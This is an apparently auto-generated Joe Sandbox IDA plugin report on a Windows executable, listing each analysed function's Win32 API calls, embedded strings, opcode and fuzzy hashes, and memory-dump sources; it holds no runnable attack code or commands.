                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: SendString
                                                                                                                                                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                      • API String ID: 890592661-1007645807
                                                                                                                                                                                                                                                      • Opcode ID: f8326a15c2f9395a49a942f5e6940130a6b7a482e447bbc67d64f9d6bd938574
                                                                                                                                                                                                                                                      • Instruction ID: f8e2c420a5a77c8ab04d7ca86ed06823962b4fa4d1377ef1b9dd02c5c23f3631
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8326a15c2f9395a49a942f5e6940130a6b7a482e447bbc67d64f9d6bd938574
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA11C8F195426979D724B361CC4AEFFBABCEBD1B10F00055EB415B20C1DE609A46E5B2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 00F07794
                                                                                                                                                                                                                                                        • Part of subcall function 00EDDC38: timeGetTime.WINMM(?,75C0B400,00F358AB), ref: 00EDDC3C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00F077C0
                                                                                                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00F077E4
                                                                                                                                                                                                                                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00F07806
                                                                                                                                                                                                                                                      • SetActiveWindow.USER32 ref: 00F07825
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F07833
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F07852
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 00F0785D
                                                                                                                                                                                                                                                      • IsWindow.USER32 ref: 00F07869
                                                                                                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 00F0787A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                      • Opcode ID: 5d2da1b4051509462776ab62976e7a523aabc8efdb080fadba73a106fb5bfc8c
                                                                                                                                                                                                                                                      • Instruction ID: bca94357edcf12cd1007f4d948a021ee86cb1fa2e8d31e4b20808f9b702513f4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d2da1b4051509462776ab62976e7a523aabc8efdb080fadba73a106fb5bfc8c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C21A174A0430DAFEB006B60EC98B763F69FB55B98F144054F905821B2CF71AC04FB21
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00F1034B
                                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F103DE
                                                                                                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00F103F2
                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F4DA8C,00000000,00000001,00F73CF8,?), ref: 00F1043E
                                                                                                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F104AD
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00F10505
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F10542
                                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00F1057E
                                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F105A1
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00F105A8
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F105DF
                                                                                                                                                                                                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00F105E1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1246142700-0
                                                                                                                                                                                                                                                      • Opcode ID: 0501599d405ee536a65d9431a15a80f9df87a02ef711f7e55a0363151dd796e6
                                                                                                                                                                                                                                                      • Instruction ID: 7c207935c866cf6d362f7efabb89fd1fe02870f07b1d54b4e41ee7a7b849b67c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0501599d405ee536a65d9431a15a80f9df87a02ef711f7e55a0363151dd796e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BB1CA75A00209AFDB04DFA4C988EAEBBF9FF48314B148459F909EB251DB71ED81DB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00F02ED6
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00F02F41
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00F02F61
                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00F02F78
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00F02FA7
                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00F02FB8
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00F02FE4
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00F02FF2
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00F0301B
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00F03029
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00F03052
                                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00F03060
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                                      • Opcode ID: 4a07c4e2102802325445860bbcee44436ed3e6194707bb6aaa1b263b5184d500
                                                                                                                                                                                                                                                      • Instruction ID: 284121a4c49c6647386d04672cc8447e7f02cfb6d82b16ff8a96a8f6b179d3dd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a07c4e2102802325445860bbcee44436ed3e6194707bb6aaa1b263b5184d500
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62511674E0478829FB75DBA488147EABFF85F11394F08458DC5C25A1C2DA58AB8CF7B2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00EFED1E
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EFED30
                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EFED8E
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00EFED99
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EFEDAB
                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EFEE01
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00EFEE0F
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EFEE20
                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EFEE63
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00EFEE71
                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EFEE8E
                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00EFEE9B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                                                                                                      • Opcode ID: 26c92c76f893e1668d43cb540df67dbb108c039b1640a7a9d8b114adce71d0fe
                                                                                                                                                                                                                                                      • Instruction ID: 47efcf2fd0ce916b038b825eb61bc3f4e5e6b2e2575bf326ef41f41c4bef6e7d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26c92c76f893e1668d43cb540df67dbb108c039b1640a7a9d8b114adce71d0fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1513475B00209AFDB18CF68DD95AAEBBB5FB98704F158129FA19E7290D770AD00CB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EDB759,?,00000000,?,?,?,?,00EDB72B,00000000,?), ref: 00EDBA58
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00EDB72B), ref: 00EDB7F6
                                                                                                                                                                                                                                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00EDB72B,00000000,?,?,00EDB2EF,?,?), ref: 00EDB88D
                                                                                                                                                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00F3D8A6
                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EDB72B,00000000,?,?,00EDB2EF,?,?), ref: 00F3D8D7
                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EDB72B,00000000,?,?,00EDB2EF,?,?), ref: 00F3D8EE
                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EDB72B,00000000,?,?,00EDB2EF,?,?), ref: 00F3D90A
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00F3D91C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 641708696-0
                                                                                                                                                                                                                                                      • Opcode ID: 8ac9988fc7a5feb249e71f644b55d86dddcd11db0ebde0bbacfcd04d185f3b9e
                                                                                                                                                                                                                                                      • Instruction ID: cc0da3dc89ba3196bd4fe7b737159408bc266d72e49acfab4a42492a06136cdb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ac9988fc7a5feb249e71f644b55d86dddcd11db0ebde0bbacfcd04d185f3b9e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C619F34901604CFDB259F18E988B75B7F9FF95325F16121EE486A6670E730A892FB40
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB526: GetWindowLongW.USER32(?,000000EB), ref: 00EDB537
                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00EDB438
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 259745315-0
                                                                                                                                                                                                                                                      • Opcode ID: a8f586ab9633eb9e8d7b8e0a5b51f8d23e834195c91af39bd4b7d36bd96cf895
                                                                                                                                                                                                                                                      • Instruction ID: d73b7f73fb62105968d9ba1f5f288013f800952b6bcdf5534cd2d33f6d1be84e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8f586ab9633eb9e8d7b8e0a5b51f8d23e834195c91af39bd4b7d36bd96cf895
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B241D334000144DFDB249F28D889BB93B66EB56734F594262FD759E2E6F7308C42E721
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 136442275-0
                                                                                                                                                                                                                                                      • Opcode ID: 82965ec51db11143a3ff4bd8839cffb68bb7153d1b61e6ace789c4cc062b3625
                                                                                                                                                                                                                                                      • Instruction ID: 5c30084e218fb39e6a4e1f2fb31666923c15114759e3ccd953813e1d66c577aa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82965ec51db11143a3ff4bd8839cffb68bb7153d1b61e6ace789c4cc062b3625
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A412A7684515CAECF61EB90CC45DCBB3BCEB44310F1051E6B649E2081EA74ABE89F50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(00F5DC00,00F5DC00,00F5DC00), ref: 00F0D7CE
                                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,00F73A70,00000061), ref: 00F0D898
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F0D8C2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                      • API String ID: 2820617543-1000479233
                                                                                                                                                                                                                                                      • Opcode ID: a361d7b758f122b28c2eecce5f2ffdc875f4f3a9b1094ec9d0289879596c4272
                                                                                                                                                                                                                                                      • Instruction ID: 233a9d534c0826825b16a1ebe1461709613a9442e5802317a75ccd265b8dde70
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a361d7b758f122b28c2eecce5f2ffdc875f4f3a9b1094ec9d0289879596c4272
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51A035504244AFC710EF54C982B6EB7E5EF94314F10982EF99A672E2EB31DD06EA42
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                      • __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1557: _xtow@16.LIBCMT ref: 00EE1578
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __itow__swprintf_xtow@16
                                                                                                                                                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                                                      • API String ID: 1502193981-2263619337
                                                                                                                                                                                                                                                      • Opcode ID: 557c941111c38d83c1b8b4b51a45370845cfb017fa841bea58e3b190977b9927
                                                                                                                                                                                                                                                      • Instruction ID: afed9030ba309b797e0d83ef15d319b18a5615770cb4960b5507852da8589319
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 557c941111c38d83c1b8b4b51a45370845cfb017fa841bea58e3b190977b9927
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0041E772904204EBDB24DF78DA45FA973E8EF44350F20546FE14AE7282EB72E942DB11
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F2A259
                                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00F2A260
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F2A273
                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F2A27B
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F2A286
                                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00F2A28F
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00F2A299
                                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F2A2AD
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F2A2B9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                      • Opcode ID: dac8feff02853b34897d45b74b4f424ff5591a05b03bcb0ab3cd47c5040e67c7
                                                                                                                                                                                                                                                      • Instruction ID: 4f85d43b2867d43df098c7e0cbd78dddc4dbb641251397d44383fb7b2beaf3a7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dac8feff02853b34897d45b74b4f424ff5591a05b03bcb0ab3cd47c5040e67c7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7316C31501129EBDF119FA4EC49FEA3B69FF1A360F110215FE19A61E0C735D811EBA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
